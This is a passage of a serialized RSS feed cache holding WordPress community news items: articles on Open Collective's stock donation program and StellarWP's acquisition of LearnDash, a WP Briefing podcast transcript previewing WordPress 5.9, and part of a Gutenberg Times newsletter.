Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:93:\"WPTavern: Open Collective Launches New Way to Support Open Source through Public Stock Shares\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=123065\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:231:\"https://wptavern.com/open-collective-launches-new-way-to-support-open-source-through-public-stock-shares?utm_source=rss&utm_medium=rss&utm_campaign=open-collective-launches-new-way-to-support-open-source-through-public-stock-shares\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3620:\"<p>It&rsquo;s no secret that companies are making loads of cash using open source technology. A 2021 <a href=\"https://www.redhat.com/en/enterprise-open-source-report/2021\">survey of 1,250 IT leaders commissioned by Red Hat</a> found that 90% are using enterprise open source software. Following the trail of major acquisitions (Red Hat at $34B, GitHub at $7.5B, and MuleSoft $6.5B), it&rsquo;s becoming more common to see companies built on open source valued at billions of dollars. </p>\n\n\n\n<p>With so much invested in open source infrastructure, many companies will assign employees to work on specific important issues for the projects they depend on, or hire them to support these projects full-time. This is an effective way to support maintainers when it works out but sometimes projects need to be able to funnel support to those who can further the software but who don&rsquo;t happen to work for one of these corporations. </p>\n\n\n\n<p>Open Collective is exploring a new way for individuals and companies to give back to the projects they use by donating public stock. The new initiative is called <a href=\"https://openstocks.co/\">Open Stocks</a>. It allows donors to support open source without having to pay capital gains tax on the appreciated amount of their stocks, which is up to 37% for those based in the US. They receive a tax write-off at the current market value of the stock. Donating some of those profits is one way to lessen the tax burden for capital gains while keeping the open source software alive that made the public stock possible in the first place.</p>\n\n\n\n<p>Open Stocks is using <a href=\"https://www.overflow.co/\">Overflow</a>, a VC-backed philanthropy platform, to streamline the stock donation process, which may have the potential to increase the average donation amount for open source projects. The startup claims &ldquo;the average stock donation through Overflow is 47X the average online ACH/debit/credit donation.&rdquo;</p>\n\n\n\n<p>Here is how it works: Donors select the open source collective they want to support and then proceed to the checkout process, which happens on the Overflow website app. Donors are asked to connect directly to their brokerage account by authenticating through the app. The Open Source Collective team will receive the donated stock converted to cash and the cash is then transferred automatically to the specified project&rsquo;s balance with a public contribution notice on their page.</p>\n\n\n\n<p>It is not very clear up front for donors what fees they will have deducted from their total donation. Open Collective did not publish this information, and it wasn&rsquo;t available on the Overflow website. Open Collective co-founders were not immediately available for comment on this.</p>\n\n\n\n<p>All currently-registered collectives are automatically able to receive stock donations. The announcement hints at future support for non-traditional forms of payment:</p>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>Stocks and shares are a huge part of the economic power of traditional geopolitical structures, and while we believe that equivalent access to those structures is a positive move for the communities we support we can&rsquo;t ignore that the world is changing&hellip; how we embrace and organize around that change may have an even bigger impact on our work.&nbsp;</p></blockquote>\n\n\n\n<p>Open Collective co-founder Pia Mancini <a href=\"https://twitter.com/piamancini/status/1439979274509897730\">confirmed on Twitter</a> that donation via cryptocurrencies is next on deck for the organization in its efforts to support open source creators.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 21 Sep 2021 03:59:01 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:65:\"WPTavern: StellarWP Acquires Learning Management System LearnDash\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=123059\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:175:\"https://wptavern.com/stellarwp-acquires-learning-management-system-learndash?utm_source=rss&utm_medium=rss&utm_campaign=stellarwp-acquires-learning-management-system-learndash\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5488:\"<p class=\"has-drop-cap\">StellarWP announced today that it <a href=\"https://stellarwp.com/stellarwp-welcomes-learndash-to-the-family/\">acquired LearnDash</a>, a learning management system (LMS) for WordPress. The product allows educators to create online courses, quizzes, and dynamic content. <a href=\"https://www.learndash.com/\">LearnDash</a> will continue to operate autonomously, keeping its team intact.</p>\n\n\n\n<p>In May, Liquid Web launched its new <a href=\"https://www.prnewswire.com/news-releases/liquid-web-family-of-brands-acquires-impressorg-and-flagship-product-givewp-301288736.html\">umbrella brand</a>, StellarWP, alongside its <a href=\"https://wptavern.com/liquid-web-acquires-givewp\">acquisition of Impress.org</a> and its flagship product, GiveWP. iThemes, The Events Calendar, Restrict Content Pro, and Kadence WP are included in this family. Each of the brands operates independently. Essentially, StellarWP functions as a &ldquo;branded house&rdquo; but is very much a &ldquo;house of brands,&rdquo; according to Chris Lema, who will be switching roles and taking the General Manager position for LearnDash.</p>\n\n\n\n<p>The LearnDash acquisition is StellarWP&rsquo;s largest to date, but the company did not provide a specific dollar amount.</p>\n\n\n\n<p>The LMS market size grew to $10.84 billion in 2020. It is projected to increase to over $13 billion in 2021, <a href=\"https://www.fortunebusinessinsights.com/industry-reports/learning-management-system-market-101376\">according to Fortune Business Insights</a>. However, when asked why the company was jumping into the space, Lema talked about the vision.</p>\n\n\n\n<p>&ldquo;The way I think about things is less about the bottom line and more about the larger vision,&rdquo; he said. &ldquo;At Liquid Web, we believe that things will continue to get more abstracted for customers. They will want, less and less, to deal with the complexities of hosting. They don&rsquo;t really want &lsquo;managed&rsquo; hosting or even &lsquo;managed WordPress&rsquo; hosting. They want a hosted solution. In other words, they want a solution that works. If they need it hosted, great. If they already have a host, great. So we&rsquo;ve been focused on building a solutions-orientation toward folks who are doing digital commerce or are building digital commerce solutions for their customers.&rdquo;</p>\n\n\n\n<p>He said that LearnDash fits perfectly into that vision for the company.</p>\n\n\n\n<p>In some ways, the global COVID-19 pandemic that began in 2020 may have hit the fast-forward button in many online sectors. The <a href=\"https://wptavern.com/tectonic-shifts-in-retail-industry-are-creating-unprecedented-opportunities-for-independent-stores\">landscape shifted</a> for small and large businesses. More people have had opportunities to take online courses or even create their own.</p>\n\n\n\n<p>&ldquo;Yes, we saw a dramatic increase in the take rate on online learning platforms across the entire space,&rdquo; said Lema. &ldquo;Last year saw a COVID dip for many, but for online learning, it was a bump. That said, I think we&rsquo;re seeing the numbers drop back down a bit into a more normal but elevated range based on what happened last year. And most importantly, more people than ever have tried their hands at online learning, and I don&rsquo;t think that&rsquo;s going to stop.&rdquo;</p>\n\n\n\n<p>Now that Liquid Web and StellarWP have built a library of multiple products, one question is how the company might begin to tie them together. There are some easy wins with cross-product integration that would fit into the vision of selling solutions.</p>\n\n\n\n<p>&ldquo;Yes, we think so too,&rdquo; said Lema. &ldquo;RCP and LearnDash, GiveWP and LearnDash, LearnDash and Nexcess, and more. I think we&rsquo;ll see a lot of collaborations across the StellarWP brands. But to be clear, each brand runs independently, so for LearnDash, we&rsquo;re still focused on all sorts of other integrations, from chat to testimonials to CRM to better Zoom integration.&rdquo;</p>\n\n\n\n<p>While he did not offer any specifics, it is likely in the cards in some form. Each of these is robust a product that, when used together, can provide a powerful toolset for building commerce-based websites.</p>\n\n\n\n<p>Lema wrote a more in-depth post on his personal blog about integrations being a <a href=\"https://chrislema.com/plugin-developers-dont-ignore-this-growth-strategy/\">vital strategy for business growth</a>. He shared a riddle that he likened to the WordPress ecosystem.</p>\n\n\n\n<p>&ldquo;I thought about it because it&rsquo;s a bit of a parable for how I see so many product owners in the WordPress ecosystem build their plugins &ndash; as if there&rsquo;s no one else in the world, building anything else that a customer might use with their product,&rdquo; he wrote.</p>\n\n\n\n<p>We will have to wait to see what sort of integrations LearnDash might have in the future. For now, the team is working on the roadmap for its updated course grid and version 4.0 feature release. The update should include dynamic learning paths.</p>\n\n\n\n<p>&ldquo;The reality in online learning is that students don&rsquo;t move in a linear fashion through material like the instructor always hopes,&rdquo; said Lema. &ldquo;Or maybe an instructor wants to support an almost choose-your-own-adventure approach. I know in my coaching, I don&rsquo;t move everyone through the same lessons in the same order. So we&rsquo;re excited to innovate in this space.&rdquo;</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 21 Sep 2021 01:16:19 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:3;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:74:\"WordPress.org blog: WP Briefing: Episode 16: A Sneak Peek at WordPress 5.9\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"https://wordpress.org/news/?post_type=podcast&p=11248\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:76:\"https://wordpress.org/news/2021/09/episode-16-a-sneak-peek-at-wordpress-5-9/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:11751:\"<p>In addition to this episode’s small list of big things, Josepha Haden Chomphosy reviews the upcoming 5.9 WordPress release and its Full Site Editing features.</p>\n\n\n\n<p><em><strong>Have a question you&#8217;d like answered? You can submit them to <a href=\"mailto:wpbriefing@wordpress.org\">wpbriefing@wordpress.org</a>, either written or as a voice recording.</strong></em></p>\n\n\n\n<h2>Credits</h2>\n\n\n\n<ul><li>Editor:&nbsp;<a href=\"https://profiles.wordpress.org/dustinhartzler/\">Dustin Hartzler</a></li><li>Logo:&nbsp;<a href=\"https://profiles.wordpress.org/beafialho/\">Beatriz Fialho</a></li><li>Production:&nbsp;<a href=\"https://profiles.wordpress.org/cbringmann/\">Chloé Bringmann</a></li><li>Song: Fearless First by Kevin MacLeod</li></ul>\n\n\n\n<h2>References </h2>\n\n\n\n<p><a href=\"https://make.wordpress.org/core/2021/09/03/wordpress-5-9-planning-roundup/\">WordPress 5.9 Planning&nbsp;</a></p>\n\n\n\n<p><a href=\"https://make.wordpress.org/core/2021/08/13/preliminary-road-to-5-9/\">5.9 Target Features</a></p>\n\n\n\n<p><a href=\"https://make.wordpress.org/core/2021/08/20/gallery-block-refactor-dev-note/\">Gallery Block Refactor Dev Notes</a></p>\n\n\n\n<p><a href=\"https://en.wikipedia.org/wiki/The_Cathedral_and_the_Bazaar\">The Cathedral and the Bazaar, 19 Lessons of Open Source</a></p>\n\n\n\n<p><a href=\"https://wptranslationday.org/\">WordPress Translation Day</a></p>\n\n\n\n<p><a href=\"https://us.wordcamp.org/2021/\">WordCamp US 2021</a></p>\n\n\n\n<p><a href=\"https://andreamiddleton.blog/2021/09/07/letters-to-an-open-source-contributor/\">Letters to an open source contributor, by Andrea Middleton</a></p>\n\n\n\n<h2>Transcript</h2>\n\n\n\n<span id=\"more-11248\"></span>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>00:10</p>\n\n\n\n<p>Hello, everyone, and welcome to the WordPress Briefing. The podcast where you can catch quick explanations of the ideas behind the WordPress open source project, some insight into the community that supports it, and get a small list of big things coming up in the next two weeks. I&#8217;m your host, Joseph Haden Chomphosy. Here we go.</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>00:40</p>\n\n\n\n<p>Today I&#8217;m going to take you through a quick look at the final WordPress release of 2021. It will be WordPress 5.9. And there will be a ton of things in it, including a fresh new default theme. And there are a few things that you need to know about it right now. The target release date is December 14, 2021, which means some of our milestones happen around Thanksgiving in the US. And a few significant commercial dates globally, days, like Giving Tuesday and Black Friday, etc. I&#8217;ll include a link to the post with all the target dates in the show notes so that you can plan with those in mind. And also in the show notes. I&#8217;ll include a link to Matías Ventura&#8217;s post that includes the target features for the release. When you look at that post, you&#8217;ll notice that you can sort of group things into two big buckets. The two buckets that I grouped them into are themes plus tools, and also better tools.&nbsp;</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>01:31</p>\n\n\n\n<p>So bucket number one themes and all their tools. Three things were important for me as I was reading through them. Number one is that there is a default theme. As of the time of this recording, I&#8217;ve seen the early concepts for the theme, and I love them. Hopefully, by the time this podcast is published, the post that showcases the look and feel will also be up on make.wordpress.org/design. If it is, I&#8217;ll include a link in the show notes to make it easy for everyone to reference.&nbsp;</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>02:04</p>\n\n\n\n<p>The second thing is block themes in general. So WordPress 5.8 brought to core WordPress a lot of the infrastructure needed to create block themes. And in this release in WordPress 5.9, much of that infrastructure will be made available for folks who don&#8217;t always feel comfortable working in the code. That&#8217;s mostly UX and UI changes. So user experience and user interface changes are based on user feedback that we&#8217;ve gathered over the last six to eight months. But it also will include the long-awaited navigation block.&nbsp;</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>02:37</p>\n\n\n\n<p>The third thing that shows up for me in this first bucket, in the themes and all their tools bucket, is the UX and interface for theme.json. The user interface that we&#8217;re making available for theme.json is a major step forward in this project has been referred to as global styles for a few years. And it kind of is what it sounds like on the box, a way for users to tap into that powerful management tool that we have built through theme.JSON.&nbsp;</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>03:09</p>\n\n\n\n<p>Bucket number two, which I am calling publicly &#8220;tools for days.&#8221; But also, I refer to it as design tools, block tools, and pattern tools. I had this whole vision of a Wizard of Oz, “lions and tigers and bears. Oh my!” moment, but I couldn’t make it work. So “design tools and block tools and pattern tools Hoorah!” That&#8217;s as close as we&#8217;re getting. So that&#8217;s my first big number two bucket for you.&nbsp;</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>03:37</p>\n\n\n\n<p>For most of these tools, the best way to describe it is quality of life improvements, lots of streamlining of what&#8217;s there, lots of building what&#8217;s not. But there&#8217;s one that&#8217;s substantial and worth digging into a bit more. And that&#8217;s the gallery block refactor. The dev note for this already exists. Like before we had the planning round-up post, the dev note was created. And so I will put a link to that in the show notes. But the headline is that this refactor will make the creation and maintenance of image blocks and the gallery block work the same way. If you are a theme or plugin developer, head on over to the dev notes that I have linked below and take some time to get familiar with it.&nbsp;</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>04:20</p>\n\n\n\n<p>And then the final thing, which has a bunch of small things in it, but will make a huge impact for all of our users overall, is that we&#8217;re working on more intuitive and responsive tools on blocks. That has come up frequently in our user testing again over the last six to eight months. And we are going to chip away at that long list of needs that we have in those particular toolsets. And that&#8217;s it. So that&#8217;s a really big broad look at what we&#8217;re trying to get into the final release of the year.</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>04:58</p>\n\n\n\n<p>I&nbsp; know that when I say like this is our hoped for stuff. This is our best guess at the moment. Sometimes it can feel like we should know that already &#8212; I should know already what&#8217;s going into the release. And on the one hand, yes, I believe in this list of things that we&#8217;re going to put into the release, I think they&#8217;re going to be good. But I always refer to it as like the hoped-for things, the things that are on the roadmap, our best targets, because I know that I don&#8217;t ever want to ship something that is going to be a worse experience for users. And so I always like to save the space to be able to remove a feature or remove an enhancement, a little bit closer to the time of the release, just to make sure that what we are offering is the best that we can offer. However, as it says right there in the 19 learnings of open source, “if there&#8217;s a bug, there&#8217;s a job,” right? There&#8217;s a lot of tolerance in open source software for shipping, slightly imperfect work. And that&#8217;s good. When we ship software that&#8217;s a little bit imperfect, it makes it clear how everyone can participate, how everyone could participate, if they could find this WordPress community that supports the CMS.&nbsp;</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>06:20</p>\n\n\n\n<p>If you&#8217;ve never participated in a release and are interested in learning how it goes, you can always follow along on make.wordpress.org/core. And of course, we do a lot of our meetings in the making WordPress, community Slack, which you can find at chat.wordpress.org if you are not already in that particular instance.</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>06:49</p>\n\n\n\n<p>That brings us now to our small list of big things. I have three things on my list for you. The first one is WP Translation day slash month. For folks who&#8217;ve been following along for a bit, you probably noticed that Translation Day has been going on all month long all of September so that we can have small individual local events and bring people into the process of translating WordPress and making WordPress more usable for more people, especially when they don&#8217;t necessarily speak English as their first language. It&#8217;s a wonderful event. There&#8217;s been Translation Day at the end of September for years. And this Translation Month is working its way up to that Translation Day; I will leave a link to the event page in the notes below. And I really encourage you to drop by.</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>07:38</p>\n\n\n\n<p>The second thing is that WordCamp US is coming up on October 1. It is going to be a virtual event, as so many of our events are right now. Tickets are open. The schedule just got published last week. And so we have a good concept of who is talking about what while we&#8217;re there. I suggest you wander over to the schedule. Take a look at anything that might be inspirational to you or anyone who looks like they&#8217;re answering questions that you&#8217;ve had as you have been trying to build your WordPress business.&nbsp;</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>08:08</p>\n\n\n\n<p>And then the third thing on my smallest of big things. Some of you may already be aware that <a href=\"https://profiles.wordpress.org/andreamiddleton/\">Andrea Middleton</a> has left the WordPress project. She has been an absolute fixture in the WordPress open source project for the last ten years. And while we will all miss her terribly, her work has been so influential and so foundational that we actually won&#8217;t really feel much like she&#8217;s gone. We will see the evidence of her work in everything she does and everything she has done while we build a better and more inclusive WordPress after her.&nbsp;</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>08:47</p>\n\n\n\n<p>As a final love letter to the community, she published a series of things that she learned about contributing to open source and especially how to contribute to WordPress as an open source project. I&#8217;m going to link those in the show notes as well. For anyone who has worked with Andrea for a long time, when you read it, it will just remind you of her voice and will be like a nice warm, comforting hug as she heads on to her next endeavors. And for folks who have never worked with her before. It&#8217;s still really excellent information that I think translates into all areas of our work, especially right now as people are moving to distributed work and remote work a bit more. Now I encourage everyone to at least give one or two of them a read.&nbsp;</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>09:38</p>\n\n\n\n<p>That, my friends, is your small list of big things. Thank you for tuning in today for the WordPress Briefing. I&#8217;m your host, Josepha Haden Chomphosy, and I&#8217;ll see you again in a couple of weeks.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 20 Sep 2021 12:00:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Chloe Bringmann\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:102:\"Gutenberg Times: Insights into theme building for FSE, Headless and Gutenberg — Weekend Edition #185\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://gutenbergtimes.com/?p=19023\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:70:\"https://gutenbergtimes.com/theme-building-for-fse-weekend-edition-185/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:15900:\"<p>Howdy,</p>\n\n\n\n\n\n<p>Now, you might have heard or read, <a href=\"https://twitter.com/andmiddleton\"><strong>Andrea Middleton</strong></a> has left Automattic after 10 years shaping and growing the WordPress Community, and new leaders for open-source. Whenever I spent time with Andrea, I came out a better person. </p>\n\n\n\n<p>I have a hard time, accepting this big change. I can&#8217;t imagine the WordPress community without Andrea Middleton. As you see, I am still in denial. ?</p>\n\n\n\n<p>Even from the distance, she makes sure we are ok. She published a blog series: <a href=\"https://andreamiddleton.blog/2021/09/07/letters-to-an-open-source-contributor/\">“Letters to an open-source contributor”</a> &#8211; That might be you, too! She shared her wisdom on <a href=\"https://andreamiddleton.blog/2021/09/07/letters-to-an-open-source-contributor-communication/\">Communication</a>, <a href=\"https://andreamiddleton.blog/2021/09/08/letters-to-an-open-source-contributor-collaboration/\">Collaboration</a>, <a href=\"https://andreamiddleton.blog/2021/09/09/criticizing-for-change/\">Criticizing for Change</a> and on <a href=\"https://andreamiddleton.blog/2021/09/10/letters-to-an-open-source-contributor-leadership/\">Leadership</a> . Andrea has a way to make us listen and hear the truth about ourselves and our community. <a href=\"https://andreamiddleton.blog/letters-to-an-open-source-contributor/\">And she promised more.</a> ?</p>\n\n\n\n<p>Well, I still keep forgetting her advice on communication:</p>\n\n\n\n<blockquote><p>„Be kind; be brief.”</p><cite>Andrea Middleton</cite></blockquote>\n\n\n\n<p><em>To clarify, I have trouble with the brief part, not the kind part.</em></p>\n\n\n\n<p>Now it&#8217;s Gutenberg time. Many people are exploring block-based Themes. How about you? We have quite a few awesome resources for you, about that and so much more. Enjoy!</p>\n\n\n\n<p>Yours, ?<br />Birgit</p>\n\n\n\n\n<a href=\"https://us02web.zoom.us/webinar/register/8816229019893/WN_TShtABQnRYKrHN6ffMFpaA\"><img /></a>\n\n\n\n<div class=\"wp-block-spacer\"></div>\n\n\n\n\n<p>We scheduled a <a href=\"https://us02web.zoom.us/webinar/register/4216223029678/WN_TShtABQnRYKrHN6ffMFpaA\">Live Q &amp; A on building Themes going from classic to block-based themes</a>. I am thrilled to discuss with Ellen Bauer, Anders Noren, and Carolina Nymark, three brilliant WordPress Themes, the challenges, and opportunities of building block-based themes, using theme.json, Block Patterns and getting ready for Full-site editing. <br /><a href=\"https://us02web.zoom.us/webinar/register/4216223029678/WN_TShtABQnRYKrHN6ffMFpaA\"><strong>Join us on October 7th, at 16:00 UTC / 11:00 EDT and register now.</strong></a></p>\n\n\n\n<hr class=\"wp-block-separator is-style-wide\" />\n\n\n\n<h2>Gutenberg Development</h2>\n\n\n\n<p>Gutenberg 11.5 was released and had quite a few enhancements, as you can read in <a href=\"https://make.wordpress.org/core/2021/09/17/whats-new-in-gutenberg-11-5-16-september/\"><strong>What’s new in Gutenberg 11.5?</strong></a> by <strong><a href=\"https://twitter.com/GetSource\">Mike Schroder</a></strong>. </p>\n\n\n\n<p><strong>Justin Tadlock</strong> has more details: <strong><a href=\"https://wptavern.com/gutenberg-11-5-adds-widget-grouping-iterates-on-the-block-gap-feature-and-updates-nav-menus#comments\">Gutenberg 11.5 Adds Widget Grouping, Iterates on the Block Gap Feature, and Updates Nav Menus</a>. </strong></p>\n\n\n\n<p><strong>Grzegorz Ziolkowski</strong> and I recorded Episode 52 of the Gutenberg Changelog podcast, and it will arrive at your favorite podcast app over the weekend.</p>\n\n\n\n<p><strong>Hector Prieto</strong> describes the next focus areas for the Gutenberg development and WordPress 5.9 in his post: <a href=\"https://make.wordpress.org/core/2021/09/17/whats-next-in-gutenberg-mid-september-2021/\"><strong>What’s next in Gutenberg? (Mid-September 2021)</strong></a></p>\n\n\n\n<p><strong>Jason Crist</strong> from the WordPress Theme team curated again <a href=\"https://make.wordpress.org/themes/2021/09/17/gutenberg-themes-week-of-september-13-2021/\"><strong>an extensive list of issues and PRs, related to full-site editing</strong></a>.  <strong>Join the discussion</strong> on adding Child Themes support for FSE, duo-tone in theme.json or how to the experiments on controlling Navigation block and screen via theme.json. </p>\n\n\n\n<h2><strong>Building Themes: Full-site Editing, Theme.json and Global Styles</strong></h2>\n\n\n\n<p><a href=\"https://twitter.com/3LPU4S\"><strong>Alfredo Navas</strong></a> dove deep into the documentation and wrote a tutorial on <a href=\"https://webdevstudios.com/2021/09/14/wordpress-fse-and-block-based-themes/\"><strong>How to use the Full-Site Editor to create a block-based theme</strong></a>.  Start with blank files and the right folder structure. After activating the theme, Navas walks you through the process of creating a fully functional theme using the Site Editor and the new theme blocks available.  No code required. You can then export it as a zip file and upload to other sites, too. </p>\n\n\n\n<hr class=\"wp-block-separator is-style-wide\" />\n\n\n\n<p>During this week&#8217;s <a href=\"https://www.youtube.com/watch?v=iRWHDo-RTGo\"><strong>Hallway Hangout,</strong></a> facilitated by <strong>Anne McCarthy</strong>, <strong>Marcus Kazmierczak </strong>and <strong>Dave Smith</strong>, attendees discuss various pathways for adopting full-site editing. There is also a <a href=\"https://make.wordpress.org/test/2021/09/17/hallway-hangout-discussion-on-adoption-pathways-for-full-site-editing-16-september/\">Recap post</a> with the recording, a summary of topics and links to all the resources mentioned.  </p>\n\n\n\n<hr class=\"wp-block-separator is-style-wide\" />\n\n\n\n<p>Take a deep dive into handling color choices via theme.json with <strong>Carolina Nymark</strong>&#8216;s Lesson on <strong><a href=\"https://fullsiteediting.com/lessons/theme-json-color-options/\">Theme.json color options</a></strong>. Nymark no only covers the usage of all color options, she also shows you how to disable the color picker, gradients, duotone etc. The disabling methods are inconsistent for all the choices. It&#8217;s important to consider context. </p>\n\n\n\n<hr class=\"wp-block-separator is-style-wide\" />\n\n\n\n<p><strong><a href=\"https://twitter.com/fabiankaegy\">Fabian Kägy</a></strong> shared his i<a href=\"https://fabian-kaegy.com/i-rebuild-my-site-as-a-block-based-theme-here-is-what-i-learned/\"><strong>nsights when he rebuilt his site as a block-based theme</strong></a>. He walked us through the various aspects of theme development and the challenges he faced. “I outline a few of the things that really impressed me and also a few areas that I have been struggling with a bit / have open questions about.” Kägy wrote. He added quite a few code examples to illustrate his thinking. Well worth following this rabbit hole! </p>\n\n\n\n<hr class=\"wp-block-separator is-style-wide\" />\n\n\n\n<p>You still have time to send in your feedback for the <a href=\"https://make.wordpress.org/test/2021/09/08/fse-program-exploration-help-with-the-future-of-block-theme-switching/\"><strong>Theme Switching Exploration</strong></a> taking place in the <strong>FSE Outreach Program</strong>. The focus of this exploration is looking at Theme switching from a longer-term 